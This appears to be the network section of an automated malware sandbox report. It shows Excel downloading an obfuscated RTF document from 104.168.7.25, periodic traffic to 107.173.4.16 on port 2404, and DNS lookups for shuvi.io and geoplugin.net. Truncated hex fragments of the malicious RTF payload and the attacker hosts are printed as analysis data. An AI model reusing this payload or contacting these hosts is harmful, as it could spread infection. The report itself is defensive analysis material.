Oct 12, 2024 16:40:04.270926952 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270944118 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270957947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270962000 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270975113 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.271039963 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.271126986 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.271173954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.274130106 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.277182102 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.355518103 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355690956 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355742931 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.355743885 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355778933 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355811119 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355844021 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355860949 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.355876923 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355910063 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355942965 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.355956078 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.355992079 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356024981 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356057882 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356090069 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.356090069 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356125116 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356173038 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.356177092 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356216908 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356249094 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356257915 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.356283903 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356316090 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356350899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.356362104 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.358059883 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358174086 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358206034 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358228922 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.358257055 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358289957 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358325005 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358335972 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.358357906 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358392000 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358411074 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.358423948 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358458042 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358489990 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358506918 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.358521938 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358556986 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.358607054 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.719096899 CEST	80	49173	178.237.33.50	192.168.2.22
Oct 12, 2024 16:40:04.719177961 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:40:09.081331968 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.083265066 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.088895082 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.720805883 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.725878000 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.725948095 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.725972891 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.725999117 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.732770920 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.732824087 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.732853889 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.732898951 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.732944965 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.734618902 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.734683037 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.739681005 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.739710093 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.739737034 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.739774942 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.741519928 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.741570950 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.741599083 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.741630077 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.741657019 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.746840954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.746867895 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.746895075 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.786154032 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:09.793206930 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:09.793277979 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:39.071664095 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:39.102334023 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:39.107140064 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:41:08.058645010 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:08.416774988 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:09.070997953 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:41:09.118757963 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:09.249521017 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:41:09.254450083 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:41:10.320034027 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:12.722237110 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:17.542646885 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:27.152266979 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:41:35.217910051 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:35.591902018 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:36.215873957 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:37.495209932 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:39.318146944 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:41:39.320404053 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:41:39.325622082 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:41:39.897490025 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:44.702291012 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:41:54.311911106 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:42:09.089056015 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:42:09.122178078 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:42:09.126940966 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:42:39.102956057 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:42:39.104818106 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:42:39.109652042 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:43:09.109553099 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:43:09.111224890 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:43:09.116070986 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:43:39.133711100 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:43:39.135406971 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:43:39.140373945 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:44:09.229746103 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:44:09.231632948 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:44:09.236525059 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:44:39.321929932 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:44:39.325938940 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:44:39.330852032 CEST	2404	49171	107.173.4.16	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 16:39:42.714364052 CEST	54562	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:42.728317976 CEST	53	54562	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:44.812314034 CEST	52917	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:44.825759888 CEST	53	52917	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:46.222738981 CEST	62751	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:46.235223055 CEST	53	62751	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:46.237077951 CEST	57893	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:46.243851900 CEST	53	57893	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:51.428133011 CEST	54821	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:51.434705019 CEST	53	54821	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:51.435782909 CEST	54719	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:51.442917109 CEST	53	54719	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:52.357556105 CEST	49881	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:52.370100021 CEST	53	49881	8.8.8.8	192.168.2.22
Oct 12, 2024 16:39:52.371568918 CEST	54998	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:39:52.379014015 CEST	53	54998	8.8.8.8	192.168.2.22
Oct 12, 2024 16:40:03.053648949 CEST	52781	53	192.168.2.22	8.8.8.8
Oct 12, 2024 16:40:03.062558889 CEST	53	52781	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 16:39:42.714364052 CEST	192.168.2.22	8.8.8.8	0x562e	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:44.812314034 CEST	192.168.2.22	8.8.8.8	0xf5de	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.222738981 CEST	192.168.2.22	8.8.8.8	0xeb58	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.237077951 CEST	192.168.2.22	8.8.8.8	0x9544	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.428133011 CEST	192.168.2.22	8.8.8.8	0x1100	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.435782909 CEST	192.168.2.22	8.8.8.8	0x2664	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.357556105 CEST	192.168.2.22	8.8.8.8	0xd97e	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.371568918 CEST	192.168.2.22	8.8.8.8	0x9c5b	Standard query (0)	shuvi.io	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:40:03.053648949 CEST	192.168.2.22	8.8.8.8	0x87f8	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 16:39:42.728317976 CEST	8.8.8.8	192.168.2.22	0x562e	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:42.728317976 CEST	8.8.8.8	192.168.2.22	0x562e	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:44.825759888 CEST	8.8.8.8	192.168.2.22	0xf5de	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:44.825759888 CEST	8.8.8.8	192.168.2.22	0xf5de	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.235223055 CEST	8.8.8.8	192.168.2.22	0xeb58	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.235223055 CEST	8.8.8.8	192.168.2.22	0xeb58	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.243851900 CEST	8.8.8.8	192.168.2.22	0x9544	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:46.243851900 CEST	8.8.8.8	192.168.2.22	0x9544	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.434705019 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.434705019 CEST	8.8.8.8	192.168.2.22	0x1100	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.442917109 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:51.442917109 CEST	8.8.8.8	192.168.2.22	0x2664	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.370100021 CEST	8.8.8.8	192.168.2.22	0xd97e	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.370100021 CEST	8.8.8.8	192.168.2.22	0xd97e	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.379014015 CEST	8.8.8.8	192.168.2.22	0x9c5b	No error (0)	shuvi.io	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:39:52.379014015 CEST	8.8.8.8	192.168.2.22	0x9c5b	No error (0)	shuvi.io	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 12, 2024 16:40:03.062558889 CEST	8.8.8.8	192.168.2.22	0x87f8	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

shuvi.io

104.168.7.25

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	104.168.7.25	80	3564	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 16:39:43.511533976 CEST	474	OUT	GET /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.7.25 Connection: Keep-Alive
Oct 12, 2024 16:39:44.018225908 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 14:39:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 10 Oct 2024 11:37:22 GMT ETag: "15a24-6241dcb39afd0" Accept-Ranges: bytes Content-Length: 88612 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 66 75 41 4d 31 6c 78 38 5a 6b 50 6e 62 6b 4f 43 69 6d 4f 35 64 56 33 72 48 76 73 4d 38 55 36 37 6b 49 31 64 64 63 4c 34 4b 68 76 43 68 69 6a 4f 57 38 30 43 4d 37 6f 70 62 4c 64 37 6b 32 4d 67 34 45 57 47 50 45 68 4f 45 52 49 47 7a 4c 4e 75 7d 0d 0d 7b 5c 32 31 33 32 39 32 37 37 33 36 28 3f 3f 38 30 b5 3c 32 3f 7c 5d 2d 7e a7 28 60 2c 2c 28 24 24 25 33 25 3e 2a 3f 5b 27 25 3f 39 37 30 60 36 40 39 25 32 34 3f 25 3e 3d 21 2f 3f 39 5d 2a 25 b0 60 5f 3a 3d b0 b5 2a 2d 21 38 5d 36 3f b0 2a 32 2b 3e 34 3c 33 33 3d 5b 3f b0 24 5d 26 25 2f 7e 2d 36 3e 2b 5f 23 2c 25 3f 3a 3b 2d 39 2c 3f 28 7c 36 27 3d 38 26 2d 36 39 25 2e 39 5b 3d 2a 7e 29 2e 2a 5b 34 5e 40 3f 33 25 3a 25 5d b5 24 3f 30 2f 5e 33 3f 21 34 5d 25 5d 3d 31 29 b0 3f 39 60 3c 24 5d 30 b0 32 3e 3b 3f 40 31 35 2c 3f 31 39 3f 27 21 21 3a 3f 3f 3f 29 b0 36 32 31 2a 39 2e 3f 3c 39 3f 23 27 2c 2a 3f 40 b0 29 3e 7c 39 34 2c 21 3c 25 27 b0 3f 2a 24 3f 3f 3a 3e 27 3f 39 5d 5f 60 3c 2b 5d 33 60 3d b0 25 30 b0 2f 2e 32 3f [TRUNCATED] Data Ascii: {\rtf1{\\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}{\2132927736(??80<2?\|]-~(`,,($$%3%>?['%?970`6@9%24?%>=!/?9]%`_:=-!8]6?2+>4<33=[?$]&%/~-6>+_#,%?:;-9,?(\|6'=8&-69%.9[=~).[4^@?3%:%]$?0/^3?!4]%]=1)?9`<$]02>;?@15,?19?'!!:???)6219.?<9?#',?@)>\|94,!<%'?$??:>'?9]_`<+]3`=%0/.2?\|^07/>0&3/5%]\|[!/3&4?%~?.\|9#7]>--,~1`%.)>]?\|+1^\|6/35'?/310&^??8-,?8^/9:00\|`:_^)>+&?,?2+#?[$\|1+'$??(%(@=7)?%,26?<5?:^9.*_%!2?;10>^`7!?)7>83?`]7(3?4+0<=)%+~8?9?(?3^/@9_:&%5'^324_0!]48'[??7#2~4?>~=4?[0(7@>@?5%.3.6$1@??=?-01!`(@53.@$8$#9#?`($5?:\|9#?%#@__?&?$?/6./5~>(?\|0(/#_??%\|,#-[@18?_%=?<~\|1/96[^3,~4?>-+=#=\|,/`;:~&??<]%?.[].78?.094.(_?.''(?!@]?@%_~/@%#@?~,~:?@@?2+\|&?++>>#5?\|@=1@.']~89+4~/=:`5<\|96,??%5>:+=;)9?+&^^7(;!?)<_(`(?`_;:(-=:?.!+@?=2~;?????:9?9<7<)0%;6%7~%'??1~2],3?5_?0].'2>$'48:,/=<:=[$??<=3?:1.;>7:4>^\|9]^'4=+[^*~&%+@-?\|`&.!]@\|
Oct 12, 2024 16:39:44.018353939 CEST	224	IN	Data Raw: 3a 39 25 3b 5b 2b 34 3f 2d 3c 27 40 35 29 36 3f b5 25 36 32 3f 3d 2d 29 3e 26 28 b5 3e 28 38 39 60 26 38 33 27 3f 2e 27 2d 7c 3f 2e 27 27 2c 27 2f 3f 3a 5d 33 60 b5 3f 7c 24 34 3d b5 25 25 32 7c 5e 5e 5b 37 38 2b 2b 3f 3a 3c 35 29 5b 32 7c 34 5d Data Ascii: :9%;[+4?-<'@5)6?%62?=-)>&(>(89`&83'?.'-\|?.'','/?:]3`?\|$4=%%2\|^^[78++?:<5)[2\|4]?$'=?58)86=/?5<_(%#83508+~=2+&.\|>%\|(9==3:?^^@9^%?)~?<9,#??75-#_!;?59?#%51~3\|~$+$;!=^@<8=`:2/=6?9.6:;'?%1#\|,_'($=`8=/[1@';1#%15?3[7
Oct 12, 2024 16:39:44.018385887 CEST	1236	IN	Data Raw: 33 2a 30 31 3b 3b 27 2b 30 32 2f 3f 27 2f 2e b5 2f 2e 40 40 37 5e 25 34 7e 32 2a b5 24 3f 40 25 38 3e 3c 7e 24 3a 2e 5e b5 3f 27 39 27 5d b0 3a 34 25 40 5e 38 7c 39 31 a7 2b 21 28 25 5d 33 2f 2b 2e 60 33 3f 2d 3e 60 36 36 3c 3a 3f 3f 2f b0 39 32 Data Ascii: 301;;'+02/?'/./.@@7^%4~2$?@%8><~$:.^?'9']:4%@^8\|91+!(%]3/+.`3?->`66<:??/92>2##\|:-0\|?8\|&>8&.+28~,'-%5\|,].#+2(/3-\|+23;&?(9%=%1%:436?()?#%&_>?/1%'<?94/;\|~2#>??.2>-47$(9<0~?$.9!2+)]8%?5%)-<;!-.[%?($(%'(~%_,?[0:_?;*8%%8,?$>%8#
Oct 12, 2024 16:39:44.018419027 CEST	1236	IN	Data Raw: 5d 2f 26 7c 32 3a 27 23 2d 31 7e b5 2d 25 7e 2a a7 5e 3f a7 2f 3f 5b b5 7c 3f 26 3c a7 27 39 2e 25 39 3a 3a 2e 2f 2a 33 36 3f 3d 3f 3f b5 25 2a b0 3f 37 30 38 5d 23 2e b0 3f 35 b5 60 5b 29 2b 37 3f 2c 27 25 3e 21 30 2f 28 7e 34 27 21 26 30 2e 7c Data Ascii: ]/&\|2:'#-1~-%~^?/?[\|?&<'9.%9::./36?=??%?708]#.?5`[)+7?,'%>!0/(~4'!&0.\|%.0:3?8<:2:3:-%[\|5]5%'9^]<.??~4?;)`[~6..\|48/?&/?!\|81;:>^1?_:1`$4__(%+55'7%;!)[/%:6^!4^)6'85<?`%]53,9?_(%_$>\|0\|/[?~8-?&/*&,'_]]).?/?\|!]%,%!?(%.%<9#0
Oct 12, 2024 16:39:44.018454075 CEST	1236	IN	Data Raw: 25 26 7e 3a 3c 3d 2c 24 2b 28 26 a7 3b 24 3f 3d 21 2d 2e 37 3f 28 3c 3a 24 3e 23 60 34 39 b0 32 2d b0 26 3f 2c 5f 3c 30 3b 3a 34 5b 5b 36 23 3f 3f 2b 31 a7 28 7c 26 36 a7 7c 3d a7 25 39 2b 30 35 37 39 5e 28 3f 5d 3d 3f 2e 25 3f 32 36 5f b0 3f 24 Data Ascii: %&~:<=,$+(&;$?=!-.7?(<:$>#`492-&?,_<0;:4[[6#??+1(\|&6\|=%9+0579^(?]=?.%?26_?$;%?!1?=25%>/\|?0?-`~@&062263:.~3?^#??%<[6<$67!.<?]?(7~19'8[?67+1_@2(;'4?57%,[?7!>%~3%(?%_!%9[89!`0?-#~?`;!=065(7>~$>93<<#.9#/_?5)?/[0.=)4'0@*@!/?
Oct 12, 2024 16:39:44.018487930 CEST	1236	IN	Data Raw: 36 33 60 35 5d 3f 3f 5e 3a 32 7c 21 3f 35 26 a7 b0 3d 32 2e 2e 5b 3f 34 34 25 2c 25 b5 3c 3f 34 5e 2a 39 7c 27 24 3b b0 3c 28 5e 37 3f 31 2a 2c 24 33 60 3f 3c 36 34 38 24 25 32 29 b5 5e 3c 2b 23 2e 37 5e 3b 33 26 a7 60 a7 29 39 2e 3a 34 2e 24 2b Data Ascii: 63`5]??^:2\|!?5&=2..[?44%,%<?4^9\|'$;<(^7?1,$3`?<648$%2)^<+#.7^;3&`)9.:4.$+/~22?(19~](_-$`->[%]_%.?[$[!,1~2#&#?<,?2!>,9!,(?/;9_&!\|=-]%[4[;;'?=&#17?>=2+>:?;>%?`;^[%<?@>?(67;\|<]@8]5$1.@)2;4>],3#`65~!.;%??::?#(&?/;?/28^
Oct 12, 2024 16:39:44.018524885 CEST	1236	IN	Data Raw: 3f 3f 5b b0 3d 2b 2e 37 3e 2c 2e 3d 36 b5 2e 3a 3b 33 21 33 b5 7e 39 3c 23 b0 33 21 38 5e 32 31 25 7e 2b 2c 3a 5f 34 b0 3f 35 3f 3c 33 38 29 7c 34 60 60 33 3f 3e 7c 23 3f 21 3a 2c a7 60 2d 7e 2a 2c b5 39 3e 3e 33 b0 29 2b 3b 40 7c 40 2c 3f 2f 2c Data Ascii: ??[=+.7>,.=6.:;3!3~9<#3!8^21%~+,:_4?5?<38)\|4``3?>\|#?!:,`-~,9>>3)+;@\|@,?/,4@<3(?:7?1?~88?88\|1?=%1/%]<$$0%5:'`=-?312]=/#:)/0)#:.46(/??=)_[%1/?':4~?^+>?.)\|91[%2?$^.]/>1??02%;;%:,?$%?9<+`7&\|=;)['2!@?10&%>\|$??\|/??,-?0@;*.
Oct 12, 2024 16:39:44.018558025 CEST	552	IN	Data Raw: 7c 24 b0 23 b5 5f 40 3e 27 3d 24 28 5d 5d a7 38 21 28 23 7e 3f 33 38 2f 34 5d 2d 3f 3f 27 3f b5 7c 33 2b 7e 2e 36 3f 3f 2a 5e 33 5d 2f 3f 3f 3d 3f 36 7c 3c 33 24 2e 2e 3f a7 31 2f 29 3f 32 a7 32 2c 29 3e 26 2c 3a 7e 5f 25 5b 3d 24 2e 2f 2a 39 24 Data Ascii: \|$#_@>'=$(]]8!(#~?38/4]-??'?\|3+~.6??^3]/??=?6\|<3$..?1/)?22,)>&,:~_%[=$./9$3:?`)-#4%+>6$1%1]=%:%%;/.7&\|&2)??~'(,[0>?8;#/:,'@<>`@??192554.)%#=?46%.&#,0??!#_=?[`\|+0%8@+0%:;>1?5(?(^?21?!70_%'&.>8]!(!2:=>%[95&=\|?9?4~])*8,^(8<=37?
Oct 12, 2024 16:39:44.018591881 CEST	1236	IN	Data Raw: 2b a7 5b 3c 39 3f 2c 39 40 7c 5e 2a a7 34 3d 3f 25 3c 25 3b 25 3f 31 24 3f 33 2b 7e 2c 7c b0 31 25 39 36 38 33 b5 30 34 34 40 36 29 3a 27 b0 29 5b 5e 3f 2f 2a 3c 23 32 b0 28 35 3c 33 28 36 25 3b a7 2a 36 7c 32 34 b0 3f 60 2e 2f 2e 2c b5 27 37 b0 Data Ascii: +[<9?,9@\|^4=?%<%;%?1$?3+~,\|1%9683044@6):')[^?/<#2(5<3(6%;6\|24?`./.,'7:_(@8%?'_]89@[-9.~.`(/&?>?3:.~678@1+2./:805%../~(/',?^<$,2\|=<#`^`=&\|^;;?97;!==@:],?[.726&')*~4%%`<<6@_10<.[-]?=-49`;0@%64#863)(~7?:=~[%0:5#^1;2/.)&7=/'1
